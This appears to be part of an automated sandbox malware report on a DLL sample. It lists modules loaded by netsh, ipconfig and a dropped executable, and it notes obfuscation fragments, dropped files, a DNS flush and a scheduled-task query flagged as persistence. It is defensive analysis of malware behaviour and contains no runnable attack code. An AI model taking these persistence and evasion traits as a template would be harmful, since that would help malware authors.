Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dnsapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: version.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: mpr.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wininet.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wsock32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: winmm.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: uxtheme.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: devobj.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: msasn1.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: c_is2022.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: c_g18030.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: c_gsm7.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: c_iscii.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: netapi32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: netutils.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: olepro32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: msimg32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: kernel.appcore.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: windows.storage.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wldp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: unrar.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: 7zxa.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: winhttp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: shfolder.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: iphlpapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: magnification.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wtsapi32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: d3d9.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: dwmapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: security.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: secur32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: sspicli.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: colorui.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: mscms.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: userenv.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: coloradapterclient.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: compstui.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: inetres.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: textshaping.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: windowscodecs.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: propsys.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: profapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wkscli.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: cscapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: winsta.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: fwpuclnt.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: idndl.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll

Source: C:\iDQiPwFWUp\ybtrrus.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: T8TY28UxiT.dll

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: T8TY28UxiT.dll

Static file information: File size 2714112 > 1048576

Source: T8TY28UxiT.dll

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1cc000

Source: T8TY28UxiT.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: T8TY28UxiT.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: g2m.pdb source: rundll32.exe, 0000000C.00000002.1908516008.000000006C85D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000013.00000002.1962876857.000000006C85D000.00000002.00000001.01000000.00000003.sdmp, T8TY28UxiT.dll
Source:	Binary string: d:\Projects\WinRAR\rar\build\unrardll32\Release\unrar.pdb source: rundll32.exe, 0000000C.00000003.1880320269.000000000316E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1934185341.0000000004D87000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 0000001C.00000002.2706441073.000000006FE65000.00000002.00000001.01000000.00000008.sdmp, ybtrrus.exe, 00000021.00000002.2704695699.000000006EA25000.00000002.00000001.01000000.0000000C.sdmp

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_6C6927E0 DllMain,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

12_2_6C6927E0

PE file contains sections with non-standard names

Source: 7zxa.dll.12.dr	Static PE information: section name: .didata
Source: 7zxa.dll.19.dr	Static PE information: section name: .didata

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00592EC8 push ebx; iretd	1_2_00592EC9
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00592ECB push 516C8D2Ch; iretd	1_2_00592ED9
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00592EF8 push ebp; iretd	1_2_00592EF9
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00592EE8 push edi; iretd	1_2_00592EE9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_034CC1C8 push eax; iretd	4_2_034CC1C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6EEDFE pushfd ; retf	12_2_6C6EEE01
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6EEF74 push esi; retf	12_2_6C6EEF77
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_009FC308 push esp; ret	15_2_009FC30D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_02DAC458 push eax; retf	18_2_02DAC4AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_02DAC567 pushad ; retf	18_2_02DAC56D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_0089C917 push eax; retf	20_2_0089C921
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE5DE65 push ecx; ret	28_2_6FE5DE78
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05457764 push ecx; mov dword ptr [esp], eax	28_2_05457765
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_0545D148 push ecx; mov dword ptr [esp], edx	28_2_0545D149
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_054608F8 push ecx; mov dword ptr [esp], eax	28_2_054608FD
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05461FC8 push ecx; mov dword ptr [esp], edx	28_2_05461FC9
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05461FB0 push ecx; mov dword ptr [esp], edx	28_2_05461FB1
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05461E76 push ecx; mov dword ptr [esp], edx	28_2_05461E79
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05461E18 push ecx; mov dword ptr [esp], edx	28_2_05461E19
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05461E24 push ecx; mov dword ptr [esp], edx	28_2_05461E25
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05461E30 push ecx; mov dword ptr [esp], edx	28_2_05461E31
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05461E9C push ecx; mov dword ptr [esp], edx	28_2_05461E9D
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05461EBE push ecx; mov dword ptr [esp], edx	28_2_05461EC1
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05461BDC push ecx; mov dword ptr [esp], edx	28_2_05461BDD
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05464D34 push ecx; mov dword ptr [esp], edx	28_2_05464D36
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05464FDC push ecx; mov dword ptr [esp], ecx	28_2_05464FE1
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_054647E6 push ecx; mov dword ptr [esp], eax	28_2_054647E9
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_0546508A push ecx; mov dword ptr [esp], ecx	28_2_05465091
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05465396 push ecx; mov dword ptr [esp], edx	28_2_05465399
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05464B9C push ecx; mov dword ptr [esp], edx	28_2_05464B9D
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05479884 push ecx; mov dword ptr [esp], ecx	28_2_05479888

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns

Drops PE files

Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\iDQiPwFWUp\7zxa.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\pnVcakKiqh\7zxa.dll			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\iDQiPwFWUp\ybtrrus.exe

Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05468BF6 IsIconic,

28_2_05468BF6

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
